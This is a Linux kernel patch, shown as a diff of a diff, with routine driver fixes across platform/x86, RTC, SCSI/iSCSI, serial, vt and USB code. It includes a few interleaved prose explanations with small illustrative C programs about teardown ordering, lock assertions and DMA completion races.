+ 	struct mutex update_mutex; /* protects race between ACPI handler and metrics thread */
+ 	bool cnqf_enabled;
+ 	bool cnqf_supported;
++	struct notifier_block pwr_src_notifier;
+ };
+ 
+ struct apmf_sps_prop_granular {
+@@ -391,9 +392,11 @@ int amd_pmf_init_sps(struct amd_pmf_dev *dev);
+ void amd_pmf_deinit_sps(struct amd_pmf_dev *dev);
+ int apmf_get_static_slider_granular(struct amd_pmf_dev *pdev,
+ 				    struct apmf_static_slider_granular_output *output);
++bool is_pprof_balanced(struct amd_pmf_dev *pmf);
+ 
+ 
+ int apmf_update_fan_idx(struct amd_pmf_dev *pdev, bool manual, u32 idx);
++int amd_pmf_set_sps_power_limits(struct amd_pmf_dev *pmf);
+ 
+ /* Auto Mode Layer */
+ int apmf_get_auto_mode_def(struct amd_pmf_dev *pdev, struct apmf_auto_mode *data);
+diff --git a/drivers/platform/x86/amd/pmf/sps.c b/drivers/platform/x86/amd/pmf/sps.c
+index dba7e36962dc1..bed762d47a14a 100644
+--- a/drivers/platform/x86/amd/pmf/sps.c
++++ b/drivers/platform/x86/amd/pmf/sps.c
+@@ -70,6 +70,24 @@ void amd_pmf_update_slider(struct amd_pmf_dev *dev, bool op, int idx,
+ 	}
+ }
+ 
++int amd_pmf_set_sps_power_limits(struct amd_pmf_dev *pmf)
++{
++	int mode;
++
++	mode = amd_pmf_get_pprof_modes(pmf);
++	if (mode < 0)
++		return mode;
++
++	amd_pmf_update_slider(pmf, SLIDER_OP_SET, mode, NULL);
++
++	return 0;
++}
++
++bool is_pprof_balanced(struct amd_pmf_dev *pmf)
++{
++	return (pmf->current_profile == PLATFORM_PROFILE_BALANCED) ? true : false;
++}
++
+ static int amd_pmf_profile_get(struct platform_profile_handler *pprof,
+ 			       enum platform_profile_option *profile)
+ {
+@@ -105,15 +123,10 @@ static int amd_pmf_profile_set(struct platform_profile_handler *pprof,
+ 			       enum platform_profile_option profile)
+ {
+ 	struct amd_pmf_dev *pmf = container_of(pprof, struct amd_pmf_dev, pprof);
+-	int mode;
+ 
+ 	pmf->current_profile = profile;
+-	mode = amd_pmf_get_pprof_modes(pmf);
+-	if (mode < 0)
+-		return mode;
+ 
+-	amd_pmf_update_slider(pmf, SLIDER_OP_SET, mode, NULL);
+-	return 0;
++	return amd_pmf_set_sps_power_limits(pmf);
+ }
+ 
+ int amd_pmf_init_sps(struct amd_pmf_dev *dev)
+@@ -123,6 +136,9 @@ int amd_pmf_init_sps(struct amd_pmf_dev *dev)
+ 	dev->current_profile = PLATFORM_PROFILE_BALANCED;
+ 	amd_pmf_load_defaults_sps(dev);
+ 
++	/* update SPS balanced power mode thermals */
++	amd_pmf_set_sps_power_limits(dev);
++
+ 	dev->pprof.profile_get = amd_pmf_profile_get;
+ 	dev->pprof.profile_set = amd_pmf_profile_set;
+ 
+diff --git a/drivers/platform/x86/dell/dell-wmi-base.c b/drivers/platform/x86/dell/dell-wmi-base.c
+index 0a259a27459f6..502783a7adb11 100644
+--- a/drivers/platform/x86/dell/dell-wmi-base.c
++++ b/drivers/platform/x86/dell/dell-wmi-base.c
+@@ -261,6 +261,9 @@ static const struct key_entry dell_wmi_keymap_type_0010[] = {
+ 	{ KE_KEY,    0x57, { KEY_BRIGHTNESSDOWN } },
+ 	{ KE_KEY,    0x58, { KEY_BRIGHTNESSUP } },
+ 
++	/* Speaker Mute */
++	{ KE_KEY, 0x109, { KEY_MUTE } },
++
+ 	/* Mic mute */
+ 	{ KE_KEY, 0x150, { KEY_MICMUTE } },
+ 
+diff --git a/drivers/platform/x86/gigabyte-wmi.c b/drivers/platform/x86/gigabyte-wmi.c
+index 5e7e6659a8497..322cfaeda17ba 100644
+--- a/drivers/platform/x86/gigabyte-wmi.c
++++ b/drivers/platform/x86/gigabyte-wmi.c
+@@ -141,6 +141,7 @@ static u8 gigabyte_wmi_detect_sensor_usability(struct wmi_device *wdev)
+ 
+ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H-CF"),
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H WIFI-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M S2H V2"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550 AORUS ELITE AX V2"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550 AORUS ELITE"),
+diff --git a/drivers/platform/x86/hp-wmi.c b/drivers/platform/x86/hp-wmi.c
+index 0a99058be8130..4a3851332ef2c 100644
+--- a/drivers/platform/x86/hp-wmi.c
++++ b/drivers/platform/x86/hp-wmi.c
+@@ -90,6 +90,7 @@ enum hp_wmi_event_ids {
+ 	HPWMI_PEAKSHIFT_PERIOD		= 0x0F,
+ 	HPWMI_BATTERY_CHARGE_PERIOD	= 0x10,
+ 	HPWMI_SANITIZATION_MODE		= 0x17,
++	HPWMI_OMEN_KEY			= 0x1D,
+ 	HPWMI_SMART_EXPERIENCE_APP	= 0x21,
+ };
+ 
+@@ -216,6 +217,8 @@ static const struct key_entry hp_wmi_keymap[] = {
+ 	{ KE_KEY, 0x213b,  { KEY_INFO } },
+ 	{ KE_KEY, 0x2169,  { KEY_ROTATE_DISPLAY } },
+ 	{ KE_KEY, 0x216a,  { KEY_SETUP } },
++	{ KE_KEY, 0x21a5,  { KEY_PROG2 } }, /* HP Omen Key */
++	{ KE_KEY, 0x21a7,  { KEY_FN_ESC } },
+ 	{ KE_KEY, 0x21a9,  { KEY_TOUCHPAD_OFF } },
+ 	{ KE_KEY, 0x121a9, { KEY_TOUCHPAD_ON } },
+ 	{ KE_KEY, 0x231b,  { KEY_HELP } },
+@@ -810,6 +813,7 @@ static void hp_wmi_notify(u32 value, void *context)
+ 	case HPWMI_SMART_ADAPTER:
+ 		break;
+ 	case HPWMI_BEZEL_BUTTON:
++	case HPWMI_OMEN_KEY:
+ 		key_code = hp_wmi_read_int(HPWMI_HOTKEY_QUERY);
+ 		if (key_code < 0)
+ 			break;
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 7fd735c67a8e6..2a48a2d880d86 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -5566,7 +5566,7 @@ static int light_sysfs_set(struct led_classdev *led_cdev,
+ 
+ static enum led_brightness light_sysfs_get(struct led_classdev *led_cdev)
+ {
+-	return (light_get_status() == 1) ? LED_FULL : LED_OFF;
++	return (light_get_status() == 1) ? LED_ON : LED_OFF;
+ }
+ 
+ static struct tpacpi_led_classdev tpacpi_led_thinklight = {
+diff --git a/drivers/rtc/rtc-efi.c b/drivers/rtc/rtc-efi.c
+index 11850c2880ad4..491b830d08183 100644
+--- a/drivers/rtc/rtc-efi.c
++++ b/drivers/rtc/rtc-efi.c
+@@ -188,9 +188,10 @@ static int efi_set_time(struct device *dev, struct rtc_time *tm)
+ 
+ static int efi_procfs(struct device *dev, struct seq_file *seq)
+ {
+-	efi_time_t      eft, alm;
+-	efi_time_cap_t  cap;
+-	efi_bool_t      enabled, pending;
++	efi_time_t        eft, alm;
++	efi_time_cap_t    cap;
++	efi_bool_t        enabled, pending;
++	struct rtc_device *rtc = dev_get_drvdata(dev);
+ 
+ 	memset(&eft, 0, sizeof(eft));
+ 	memset(&alm, 0, sizeof(alm));
+@@ -213,23 +214,25 @@ static int efi_procfs(struct device *dev, struct seq_file *seq)
+ 		/* XXX fixme: convert to string? */
+ 		seq_printf(seq, "Timezone\t: %u\n", eft.timezone);
+ 
+-	seq_printf(seq,
+-		   "Alarm Time\t: %u:%u:%u.%09u\n"
+-		   "Alarm Date\t: %u-%u-%u\n"
+-		   "Alarm Daylight\t: %u\n"
+-		   "Enabled\t\t: %s\n"
+-		   "Pending\t\t: %s\n",
+-		   alm.hour, alm.minute, alm.second, alm.nanosecond,
+-		   alm.year, alm.month, alm.day,
+-		   alm.daylight,
+-		   enabled == 1 ? "yes" : "no",
+-		   pending == 1 ? "yes" : "no");
+-
+-	if (eft.timezone == EFI_UNSPECIFIED_TIMEZONE)
+-		seq_puts(seq, "Timezone\t: unspecified\n");
+-	else
+-		/* XXX fixme: convert to string? */
+-		seq_printf(seq, "Timezone\t: %u\n", alm.timezone);
++	if (test_bit(RTC_FEATURE_ALARM, rtc->features)) {
++		seq_printf(seq,
++			   "Alarm Time\t: %u:%u:%u.%09u\n"
++			   "Alarm Date\t: %u-%u-%u\n"
++			   "Alarm Daylight\t: %u\n"
++			   "Enabled\t\t: %s\n"
++			   "Pending\t\t: %s\n",
++			   alm.hour, alm.minute, alm.second, alm.nanosecond,
++			   alm.year, alm.month, alm.day,
++			   alm.daylight,
++			   enabled == 1 ? "yes" : "no",
++			   pending == 1 ? "yes" : "no");
++
++		if (eft.timezone == EFI_UNSPECIFIED_TIMEZONE)
++			seq_puts(seq, "Timezone\t: unspecified\n");
++		else
++			/* XXX fixme: convert to string? */
++			seq_printf(seq, "Timezone\t: %u\n", alm.timezone);
++	}
+ 
+ 	/*
+ 	 * now prints the capabilities
+@@ -269,7 +272,10 @@ static int __init efi_rtc_probe(struct platform_device *dev)
+ 
+ 	rtc->ops = &efi_rtc_ops;
+ 	clear_bit(RTC_FEATURE_UPDATE_INTERRUPT, rtc->features);
+-	set_bit(RTC_FEATURE_ALARM_WAKEUP_ONLY, rtc->features);
++	if (efi_rt_services_supported(EFI_RT_SUPPORTED_WAKEUP_SERVICES))
++		set_bit(RTC_FEATURE_ALARM_WAKEUP_ONLY, rtc->features);
++	else
++		clear_bit(RTC_FEATURE_ALARM, rtc->features);
+ 
+ 	return devm_rtc_register_device(rtc);
+ }
+diff --git a/drivers/rtc/rtc-sunplus.c b/drivers/rtc/rtc-sunplus.c
+index e8e2ab1103fc0..4b578e4d44f6a 100644
+--- a/drivers/rtc/rtc-sunplus.c
++++ b/drivers/rtc/rtc-sunplus.c
+@@ -240,8 +240,8 @@ static int sp_rtc_probe(struct platform_device *plat_dev)
+ 	if (IS_ERR(sp_rtc->reg_base))
+ 		return dev_err_probe(&plat_dev->dev, PTR_ERR(sp_rtc->reg_base),
+ 					    "%s devm_ioremap_resource fail\n", RTC_REG_NAME);
+-	dev_dbg(&plat_dev->dev, "res = 0x%x, reg_base = 0x%lx\n",
+-		sp_rtc->res->start, (unsigned long)sp_rtc->reg_base);
++	dev_dbg(&plat_dev->dev, "res = %pR, reg_base = %p\n",
++		sp_rtc->res, sp_rtc->reg_base);
+ 
+ 	sp_rtc->irq = platform_get_irq(plat_dev, 0);
+ 	if (sp_rtc->irq < 0)
+diff --git a/drivers/s390/char/zcore.c b/drivers/s390/char/zcore.c
+index 6165e6aae762a..a41833557d550 100644
+--- a/drivers/s390/char/zcore.c
++++ b/drivers/s390/char/zcore.c
+@@ -103,7 +103,7 @@ static inline int memcpy_hsa_kernel(void *dst, unsigned long src, size_t count)
+ 
+ 	kvec.iov_base = dst;
+ 	kvec.iov_len = count;
+-	iov_iter_kvec(&iter, WRITE, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 	if (memcpy_hsa_iter(&iter, src, count) < count)
+ 		return -EIO;
+ 	return 0;
+diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
+index 5fb1f364e8155..c3ad04ad66e0a 100644
+--- a/drivers/scsi/iscsi_tcp.c
++++ b/drivers/scsi/iscsi_tcp.c
+@@ -848,7 +848,7 @@ static int iscsi_sw_tcp_host_get_param(struct Scsi_Host *shost,
+ 				       enum iscsi_host_param param, char *buf)
+ {
+ 	struct iscsi_sw_tcp_host *tcp_sw_host = iscsi_host_priv(shost);
+-	struct iscsi_session *session = tcp_sw_host->session;
++	struct iscsi_session *session;
+ 	struct iscsi_conn *conn;
+ 	struct iscsi_tcp_conn *tcp_conn;
+ 	struct iscsi_sw_tcp_conn *tcp_sw_conn;
+@@ -858,6 +858,7 @@ static int iscsi_sw_tcp_host_get_param(struct Scsi_Host *shost,
+ 
+ 	switch (param) {
+ 	case ISCSI_HOST_PARAM_IPADDRESS:
++		session = tcp_sw_host->session;
+ 		if (!session)
+ 			return -ENOTCONN;
+ 
+@@ -958,11 +959,13 @@ iscsi_sw_tcp_session_create(struct iscsi_endpoint *ep, uint16_t cmds_max,
+ 	if (!cls_session)
+ 		goto remove_host;
+ 	session = cls_session->dd_data;
+-	tcp_sw_host = iscsi_host_priv(shost);
+-	tcp_sw_host->session = session;
+ 
+ 	if (iscsi_tcp_r2tpool_alloc(session))
+ 		goto remove_session;
++
++	/* We are now fully set up, so expose the session to sysfs. */
++	tcp_sw_host = iscsi_host_priv(shost);
++	tcp_sw_host->session = session;
+ 	return cls_session;
+ 
+ remove_session:
+@@ -982,10 +985,17 @@ static void iscsi_sw_tcp_session_destroy(struct iscsi_cls_session *cls_session)
+ 	if (WARN_ON_ONCE(session->leadconn))
+ 		return;
+ 
++	iscsi_session_remove(cls_session);
++	/*
++	 * Our get_host_param needs to access the session, so remove the
++	 * host from sysfs before freeing the session to make sure userspace
++	 * is no longer accessing the callout.
++	 */
++	iscsi_host_remove(shost, false);
++
+ 	iscsi_tcp_r2tpool_free(cls_session->dd_data);
+-	iscsi_session_teardown(cls_session);
+ 
+-	iscsi_host_remove(shost, false);
++	iscsi_session_free(cls_session);
+ 	iscsi_host_free(shost);
+ }
+ 
+diff --git a/drivers/scsi/libiscsi.c b/drivers/scsi/libiscsi.c
+index d95f4bcdeb2ec..6e811d753cb14 100644
+--- a/drivers/scsi/libiscsi.c
++++ b/drivers/scsi/libiscsi.c
+@@ -3104,17 +3104,32 @@ dec_session_count:
+ }
+ EXPORT_SYMBOL_GPL(iscsi_session_setup);
+ 
+-/**
+- * iscsi_session_teardown - destroy session, host, and cls_session
+- * @cls_session: iscsi session
++/*
++ * iscsi_session_remove - Remove session from iSCSI class.
+  */
+-void iscsi_session_teardown(struct iscsi_cls_session *cls_session)
++void iscsi_session_remove(struct iscsi_cls_session *cls_session)
+ {
+ 	struct iscsi_session *session = cls_session->dd_data;
+-	struct module *owner = cls_session->transport->owner;
+ 	struct Scsi_Host *shost = session->host;
+ 
+ 	iscsi_remove_session(cls_session);
++	/*
++	 * host removal only has to wait for its children to be removed from
++	 * sysfs, and iscsi_tcp needs to do iscsi_host_remove before freeing
++	 * the session, so drop the session count here.
++	 */
++	iscsi_host_dec_session_cnt(shost);
++}
++EXPORT_SYMBOL_GPL(iscsi_session_remove);
++
++/**
++ * iscsi_session_free - Free iscsi session and its resources
++ * @cls_session: iscsi session
++ */
++void iscsi_session_free(struct iscsi_cls_session *cls_session)
++{
++	struct iscsi_session *session = cls_session->dd_data;
++	struct module *owner = cls_session->transport->owner;
+ 
+ 	iscsi_pool_free(&session->cmdpool);
+ 	kfree(session->password);
+@@ -3132,10 +3147,19 @@ void iscsi_session_teardown(struct iscsi_cls_session *cls_session)
+ 	kfree(session->discovery_parent_type);
+ 
+ 	iscsi_free_session(cls_session);
+-
+-	iscsi_host_dec_session_cnt(shost);
+ 	module_put(owner);
+ }
++EXPORT_SYMBOL_GPL(iscsi_session_free);
++
++/**
++ * iscsi_session_teardown - destroy session and cls_session
++ * @cls_session: iscsi session
++ */
++void iscsi_session_teardown(struct iscsi_cls_session *cls_session)
++{
++	iscsi_session_remove(cls_session);
++	iscsi_session_free(cls_session);
++}
+ EXPORT_SYMBOL_GPL(iscsi_session_teardown);
+ 
+ /**
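
Splitting iscsi_session_teardown() lets iscsi_tcp unpublish the session, remove the host whose sysfs callouts still dereference it, and only then free the memory, while the combined helper remains for drivers without that ordering constraint. A standalone sketch of the remove/free split (names are illustrative):

#include <stdio.h>
#include <stdlib.h>

struct session { int id; };

/* Phase 1: make the object unreachable (sysfs removal in the kernel). */
static void session_remove(struct session *s)
{
	printf("session %d unpublished\n", s->id);
}

/* Phase 2: release resources; safe only once nothing can reach it. */
static void session_free(struct session *s)
{
	free(s);
}

/* One-shot helper kept for callers with no ordering constraint. */
static void session_teardown(struct session *s)
{
	session_remove(s);
	session_free(s);
}

int main(void)
{
	struct session *s = malloc(sizeof(*s));

	if (!s)
		return 1;
	s->id = 1;

	/* iscsi_tcp-style interleaving: */
	session_remove(s);
	puts("remove the host here; the session is still allocated");
	session_free(s);

	(void)session_teardown;	/* other drivers keep the combined path */
	return 0;
}
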
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index 5d27f5196de6f..d149b218715e5 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1233,8 +1233,7 @@ static int scsi_probe_and_add_lun(struct scsi_target *starget,
+ 	 * that no LUN is present, so don't add sdev in these cases.
+ 	 * Two specific examples are:
+ 	 * 1) NetApp targets: return PQ=1, PDT=0x1f
+-	 * 2) IBM/2145 targets: return PQ=1, PDT=0
+-	 * 3) USB UFI: returns PDT=0x1f, with the PQ bits being "reserved"
++	 * 2) USB UFI: returns PDT=0x1f, with the PQ bits being "reserved"
+ 	 *    in the UFI 1.0 spec (we cannot rely on reserved bits).
+ 	 *
+ 	 * References:
+@@ -1248,8 +1247,8 @@ static int scsi_probe_and_add_lun(struct scsi_target *starget,
+ 	 * PDT=00h Direct-access device (floppy)
+ 	 * PDT=1Fh none (no FDD connected to the requested logical unit)
+ 	 */
+-	if (((result[0] >> 5) == 1 ||
+-	    (starget->pdt_1f_for_no_lun && (result[0] & 0x1f) == 0x1f)) &&
++	if (((result[0] >> 5) == 1 || starget->pdt_1f_for_no_lun) &&
++	    (result[0] & 0x1f) == 0x1f &&
+ 	    !scsi_is_wlun(lun)) {
+ 		SCSI_LOG_SCAN_BUS(3, sdev_printk(KERN_INFO, sdev,
+ 					"scsi scan: peripheral device type"
+diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
+index ce34a8ad53b4e..12344be14232b 100644
+--- a/drivers/scsi/sg.c
++++ b/drivers/scsi/sg.c
+@@ -1726,7 +1726,7 @@ sg_start_req(Sg_request *srp, unsigned char *cmd)
+ 	Sg_scatter_hold *rsv_schp = &sfp->reserve;
+ 	struct request_queue *q = sfp->parentdp->device->request_queue;
+ 	struct rq_map_data *md, map_data;
+-	int rw = hp->dxfer_direction == SG_DXFER_TO_DEV ? WRITE : READ;
++	int rw = hp->dxfer_direction == SG_DXFER_TO_DEV ? ITER_SOURCE : ITER_DEST;
+ 	struct scsi_cmnd *scmd;
+ 
+ 	SCSI_LOG_TIMEOUT(4, sg_printk(KERN_INFO, sfp->parentdp,
+diff --git a/drivers/target/iscsi/iscsi_target_util.c b/drivers/target/iscsi/iscsi_target_util.c
+index 8d9f21372b674..26dc8ed3045b6 100644
+--- a/drivers/target/iscsi/iscsi_target_util.c
++++ b/drivers/target/iscsi/iscsi_target_util.c
+@@ -1225,7 +1225,7 @@ int rx_data(
+ 		return -1;
+ 
+ 	memset(&msg, 0, sizeof(struct msghdr));
+-	iov_iter_kvec(&msg.msg_iter, READ, iov, iov_count, data);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, iov, iov_count, data);
+ 
+ 	while (msg_data_left(&msg)) {
+ 		rx_loop = sock_recvmsg(conn->sock, &msg, MSG_WAITALL);
+@@ -1261,7 +1261,7 @@ int tx_data(
+ 
+ 	memset(&msg, 0, sizeof(struct msghdr));
+ 
+-	iov_iter_kvec(&msg.msg_iter, WRITE, iov, iov_count, data);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, iov, iov_count, data);
+ 
+ 	while (msg_data_left(&msg)) {
+ 		int tx_loop = sock_sendmsg(conn->sock, &msg);
+diff --git a/drivers/target/target_core_file.c b/drivers/target/target_core_file.c
+index 28aa643be5d5e..7e81a53dbf3ca 100644
+--- a/drivers/target/target_core_file.c
++++ b/drivers/target/target_core_file.c
+@@ -337,7 +337,7 @@ static int fd_do_rw(struct se_cmd *cmd, struct file *fd,
+ 		len += sg->length;
+ 	}
+ 
+-	iov_iter_bvec(&iter, READ, bvec, sgl_nents, len);
++	iov_iter_bvec(&iter, is_write, bvec, sgl_nents, len);
+ 	if (is_write)
+ 		ret = vfs_iter_write(fd, &iter, &pos, 0);
+ 	else
+@@ -473,7 +473,7 @@ fd_execute_write_same(struct se_cmd *cmd)
+ 		len += se_dev->dev_attrib.block_size;
+ 	}
+ 
+-	iov_iter_bvec(&iter, READ, bvec, nolb, len);
++	iov_iter_bvec(&iter, ITER_SOURCE, bvec, nolb, len);
+ 	ret = vfs_iter_write(fd_dev->fd_file, &iter, &pos, 0);
+ 
+ 	kfree(bvec);
+diff --git a/drivers/target/target_core_tmr.c b/drivers/target/target_core_tmr.c
+index bac111456fa1d..2b95b4550a637 100644
+--- a/drivers/target/target_core_tmr.c
++++ b/drivers/target/target_core_tmr.c
+@@ -73,8 +73,8 @@ static bool __target_check_io_state(struct se_cmd *se_cmd,
+ {
+ 	struct se_session *sess = se_cmd->se_sess;
+ 
+-	assert_spin_locked(&sess->sess_cmd_lock);
+-	WARN_ON_ONCE(!irqs_disabled());
++	lockdep_assert_held(&sess->sess_cmd_lock);
++
+ 	/*
+ 	 * If command already reached CMD_T_COMPLETE state within
+ 	 * target_complete_cmd() or CMD_T_FABRIC_STOP due to shutdown,
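
Replacing assert_spin_locked() plus WARN_ON_ONCE(!irqs_disabled()) with lockdep_assert_held() is the preferred idiom: it compiles away on non-lockdep builds and, unlike the open-coded pair, asserts that the current context owns the lock rather than that somebody does. A userspace analogue that tracks the owner explicitly (a model, not the kernel's lockdep; compile with -pthread):

#include <assert.h>
#include <pthread.h>
#include <stdio.h>

/* Model of lockdep_assert_held(): check that the CURRENT thread is
 * the recorded owner, not merely that the lock is taken. */
struct tracked_lock {
	pthread_mutex_t m;
	pthread_t owner;
	int held;
};

static void t_lock(struct tracked_lock *l)
{
	pthread_mutex_lock(&l->m);
	l->owner = pthread_self();
	l->held = 1;
}

static void t_unlock(struct tracked_lock *l)
{
	l->held = 0;
	pthread_mutex_unlock(&l->m);
}

static void assert_held(struct tracked_lock *l)
{
	assert(l->held && pthread_equal(l->owner, pthread_self()));
}

static struct tracked_lock lock = { .m = PTHREAD_MUTEX_INITIALIZER };

int main(void)
{
	t_lock(&lock);
	assert_held(&lock);	/* passes: we are the owner */
	puts("ok");
	t_unlock(&lock);
	return 0;
}
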
+diff --git a/drivers/tty/serial/8250/8250_dma.c b/drivers/tty/serial/8250/8250_dma.c
+index b85c82616e8cb..a442f0dfd28e9 100644
+--- a/drivers/tty/serial/8250/8250_dma.c
++++ b/drivers/tty/serial/8250/8250_dma.c
+@@ -44,19 +44,39 @@ static void __dma_rx_complete(void *param)
+ 	struct uart_8250_dma	*dma = p->dma;
+ 	struct tty_port		*tty_port = &p->port.state->port;
+ 	struct dma_tx_state	state;
++	enum dma_status		dma_status;
+ 	int			count;
+ 
+-	dma->rx_running = 0;
+-	dmaengine_tx_status(dma->rxchan, dma->rx_cookie, &state);
++	/*
++	 * A new DMA Rx can be started during the completion handler before it
++	 * could acquire the port's lock, and it might still be ongoing. Don't
++	 * do anything in that case.
++	 */
++	dma_status = dmaengine_tx_status(dma->rxchan, dma->rx_cookie, &state);
++	if (dma_status == DMA_IN_PROGRESS)
++		return;
+ 
+ 	count = dma->rx_size - state.residue;
+ 
+ 	tty_insert_flip_string(tty_port, dma->rx_buf, count);
+ 	p->port.icount.rx += count;
++	dma->rx_running = 0;
+ 
+ 	tty_flip_buffer_push(tty_port);
+ }
+ 
++static void dma_rx_complete(void *param)
++{
++	struct uart_8250_port *p = param;
++	struct uart_8250_dma *dma = p->dma;
++	unsigned long flags;
++
++	spin_lock_irqsave(&p->port.lock, flags);
++	if (dma->rx_running)
++		__dma_rx_complete(p);
++	spin_unlock_irqrestore(&p->port.lock, flags);
++}
++
+ int serial8250_tx_dma(struct uart_8250_port *p)
+ {
+ 	struct uart_8250_dma		*dma = p->dma;
+@@ -130,7 +150,7 @@ int serial8250_rx_dma(struct uart_8250_port *p)
+ 		return -EBUSY;
+ 
+ 	dma->rx_running = 1;
+-	desc->callback = __dma_rx_complete;
++	desc->callback = dma_rx_complete;
+ 	desc->callback_param = p;
+ 
+ 	dma->rx_cookie = dmaengine_submit(desc);
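
The 8250 DMA fix takes the port lock in the callback and re-checks both the driver's own flag (rx_running) and the engine's status (dmaengine_tx_status() reporting DMA_IN_PROGRESS) before consuming data, since the completion callback can race with an Rx restart from the interrupt path. A generic check-under-lock sketch with a pthread mutex standing in for the port spinlock (compile with -pthread):

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static bool rx_running;
static bool engine_in_progress;	/* stand-in for DMA_IN_PROGRESS */

static void complete_rx(void)
{
	pthread_mutex_lock(&lock);

	/* Re-check under the lock: the transfer may have been restarted
	 * (still running) or already consumed by the other path. */
	if (rx_running && !engine_in_progress) {
		puts("push received bytes to the tty layer");
		rx_running = false;
	}

	pthread_mutex_unlock(&lock);
}

int main(void)
{
	rx_running = true;
	engine_in_progress = false;
	complete_rx();		/* consumes the data exactly once */
	complete_rx();		/* late duplicate callback: no-op */
	return 0;
}
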
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index b8aed28b8f17b..0e6ef24419c8e 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -798,25 +798,11 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 		spin_unlock(&port->lock);
+ 	}
+ 
+-	if (stm32_usart_rx_dma_enabled(port))
+-		return IRQ_WAKE_THREAD;
+-	else
+-		return IRQ_HANDLED;
+-}
+-
+-static irqreturn_t stm32_usart_threaded_interrupt(int irq, void *ptr)
+-{
+-	struct uart_port *port = ptr;
+-	struct tty_port *tport = &port->state->port;
+-	struct stm32_port *stm32_port = to_stm32_port(port);
+-	unsigned int size;
+-	unsigned long flags;
+-
+ 	/* Receiver timeout irq for DMA RX */
+-	if (!stm32_port->throttled) {
+-		spin_lock_irqsave(&port->lock, flags);
++	if (stm32_usart_rx_dma_enabled(port) && !stm32_port->throttled) {
++		spin_lock(&port->lock);
+ 		size = stm32_usart_receive_chars(port, false);
+-		uart_unlock_and_check_sysrq_irqrestore(port, flags);
++		uart_unlock_and_check_sysrq(port);
+ 		if (size)
+ 			tty_flip_buffer_push(tport);
+ 	}
+@@ -1016,10 +1002,8 @@ static int stm32_usart_startup(struct uart_port *port)
+ 	u32 val;
+ 	int ret;
+ 
+-	ret = request_threaded_irq(port->irq, stm32_usart_interrupt,
+-				   stm32_usart_threaded_interrupt,
+-				   IRQF_ONESHOT | IRQF_NO_SUSPEND,
+-				   name, port);
++	ret = request_irq(port->irq, stm32_usart_interrupt,
++			  IRQF_NO_SUSPEND, name, port);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1602,13 +1586,6 @@ static int stm32_usart_of_dma_rx_probe(struct stm32_port *stm32port,
+ 	struct dma_slave_config config;
+ 	int ret;
+ 
+-	/*
+-	 * Using DMA and threaded handler for the console could lead to
+-	 * deadlocks.
+-	 */
+-	if (uart_console(port))
+-		return -ENODEV;
+-
+ 	stm32port->rx_buf = dma_alloc_coherent(dev, RX_BUF_L,
+ 					       &stm32port->rx_dma_buf,
+ 					       GFP_KERNEL);
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index 1850bacdb5b0e..f566eb1839dc5 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -386,10 +386,6 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 
+ 	uni_mode = use_unicode(inode);
+ 	attr = use_attributes(inode);
+-	ret = -ENXIO;
+-	vc = vcs_vc(inode, &viewed);
+-	if (!vc)
+-		goto unlock_out;
+ 
+ 	ret = -EINVAL;
+ 	if (pos < 0)
+@@ -407,6 +403,11 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 		unsigned int this_round, skip = 0;
+ 		int size;
+ 
++		ret = -ENXIO;
++		vc = vcs_vc(inode, &viewed);
++		if (!vc)
++			goto unlock_out;
++
+ 		/* Check whether we are above size each round,
+ 		 * as copy_to_user at the end of this loop
+ 		 * could sleep.
+diff --git a/drivers/usb/dwc3/dwc3-qcom.c b/drivers/usb/dwc3/dwc3-qcom.c
+index b0a0351d2d8b5..959fc925ca7c5 100644
+--- a/drivers/usb/dwc3/dwc3-qcom.c
++++ b/drivers/usb/dwc3/dwc3-qcom.c
+@@ -901,7 +901,7 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 	qcom->mode = usb_get_dr_mode(&qcom->dwc3->dev);
+ 
+ 	/* enable vbus override for device mode */
+-	if (qcom->mode == USB_DR_MODE_PERIPHERAL)
++	if (qcom->mode != USB_DR_MODE_HOST)
+ 		dwc3_qcom_vbus_override_enable(qcom, true);
+ 
+ 	/* register extcon to override sw_vbus on Vbus change later */
+diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
+index 523a961b910bb..8ad354741380d 100644
+--- a/drivers/usb/gadget/function/f_fs.c
++++ b/drivers/usb/gadget/function/f_fs.c
+@@ -279,8 +279,10 @@ static int __ffs_ep0_queue_wait(struct ffs_data *ffs, char *data, size_t len)
+ 	struct usb_request *req = ffs->ep0req;
+ 	int ret;
+ 
+-	if (!req)
++	if (!req) {
++		spin_unlock_irq(&ffs->ev.waitq.lock);
+ 		return -EINVAL;
++	}
+ 
+ 	req->zero     = len < le16_to_cpu(ffs->ev.setup.wLength);
+ 
